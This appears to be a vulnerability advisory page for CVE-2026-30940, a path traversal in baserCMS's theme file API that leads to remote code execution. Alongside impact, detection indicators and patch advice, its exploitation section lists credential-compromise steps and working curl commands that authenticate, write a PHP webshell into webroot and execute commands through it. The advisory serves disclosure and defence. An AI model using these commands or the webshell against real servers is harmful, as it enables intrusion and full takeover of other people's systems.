CVE-2026-30940: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-30940 is a path traversal vulnerability in the baserCMS theme file management API that allows arbitrary file write and remote code execution (RCE). It affects baserCMS versions up to and including 5.2.2 (all 5.x releases prior to 5.2.3). The vulnerability was published on March 30–31, 2026, and patched in version 5.2.3 released March 26, 2026. It carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Github Advisory).

Technical details

The root cause is improper path sanitization in plugins/bc-theme-file/src/Service/BcThemeFileService.php, specifically in the getFullpath() method, which concatenates a user-supplied $path parameter directly into a file system path without normalization or boundary validation (CWE-22, CWE-73). An authenticated administrator can supply ../ sequences in the path parameter of the theme file creation API endpoint (/baser/api/admin/bc-theme-file/theme_files/add.json) to write arbitrary PHP files outside the intended theme directory — for example, into the publicly accessible webroot/ directory. When the API is enabled (USE_CORE_ADMIN_API=true), exploitation is direct via JWT-authenticated API calls; when disabled (default), exploitation requires chaining with another vulnerability such as XSS to obtain a valid session. A fully functional proof-of-concept using curl commands is publicly documented in the security advisory (GitHub Advisory).

Impact

Successful exploitation allows an authenticated administrator to write arbitrary PHP files to any directory accessible by the web server process, including the publicly reachable webroot/. This results in full remote code execution on the server, enabling an attacker to execute OS commands, exfiltrate sensitive data (confidentiality impact: High), modify or delete application files (integrity impact: High), and potentially disrupt service availability (availability impact: High). In environments where the admin panel is exposed to untrusted users or where XSS vulnerabilities exist, the effective attack surface is broader than administrator-only access (Github Advisory, baserCMS Release).

Exploitability

A complete, step-by-step proof-of-concept exploit — including curl commands for authentication, webshell creation via path traversal, and RCE execution — is publicly available in the official security advisory (GitHub Advisory). The EPSS score is approximately 0.151% (36th percentile), indicating a relatively low but non-negligible probability of exploitation in the near term. There is no current evidence of in-the-wild exploitation or threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog as of the time of this report (Github Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing baserCMS 5.x instances running versions ≤ 5.2.2. Check whether the admin API is enabled (USE_CORE_ADMIN_API=true) by probing the login endpoint.
  2. Obtain administrator credentials: Compromise an admin account via credential stuffing, brute force, phishing, or by chaining with another vulnerability (e.g., XSS) if the API is disabled by default.
  3. Authenticate and obtain JWT token: Send a POST request to the login API to retrieve a Bearer token:
curl -X POST "http://target/baser/api/admin/baser-core/users/login.json" \
  -H "Content-Type: application/json" \
  -d '{"email":"admin@example.com","password":"password"}'
  1. Create a PHP webshell via path traversal: Use the obtained token to POST to the theme file API with a path traversal payload targeting the webroot:
curl -X POST "http://target/baser/api/admin/bc-theme-file/theme_files/add.json" \
  -H "Authorization: Bearer <TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{
    "theme": "BcThemeSample",
    "plugin": "",
    "type": "layout",
    "path": "../../../../webroot/",
    "base_name": "shell",
    "ext": "php",
    "contents": "<?php system($_GET[\"cmd\"]); ?>"
  }'
  1. Execute arbitrary commands: Access the newly created webshell directly via HTTP to achieve RCE:
curl "http://target/shell.php?cmd=id"

(GitHub Advisory)

Indicators of compromise

  • Network: Unusual POST requests to /baser/api/admin/bc-theme-file/theme_files/add.json with path parameters containing ../ sequences; HTTP GET requests to unexpected .php files in the webroot (e.g., /shell.php, /cmd.php) from external IPs.
  • File System: Unexpected PHP files created in webroot/ or other directories outside the theme directory (e.g., plugins/BcThemeSample/templates/); file timestamps inconsistent with normal deployment activity.
  • Logs: Web server access logs showing POST requests to the theme file API endpoint with encoded or literal ../ in JSON body parameters; subsequent GET requests to newly created PHP files with query parameters like ?cmd= or ?c=.
  • Process: Unusual child processes spawned by the PHP-FPM or web server process (e.g., id, whoami, bash, curl, wget) following access to unexpected PHP files in the webroot. (GitHub Advisory)

Mitigation and workarounds

Upgrade baserCMS to version 5.2.3 or later, which patches this vulnerability by implementing proper path boundary validation using canonicalized paths (e.g., realpath()) to ensure file writes remain within the theme base directory (baserCMS Release, basercms.net). As an interim workaround, disable the admin API (USE_CORE_ADMIN_API=false, which is the default) to prevent direct external exploitation; note that this does not fully mitigate the risk if XSS or other vulnerabilities exist that could be chained. Additionally, restrict administrative access to trusted users only and monitor for unexpected PHP file creation in the webroot directory (Github Advisory).

Community reactions

The vulnerability was reported by security researcher kaminuma and disclosed via the baserCMS GitHub security advisory on March 30, 2026. A Bluesky post from the CyberHub blog noted the vulnerability shortly after disclosure. No major media coverage or notable researcher commentary beyond the official advisory has been identified at this time (Github Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management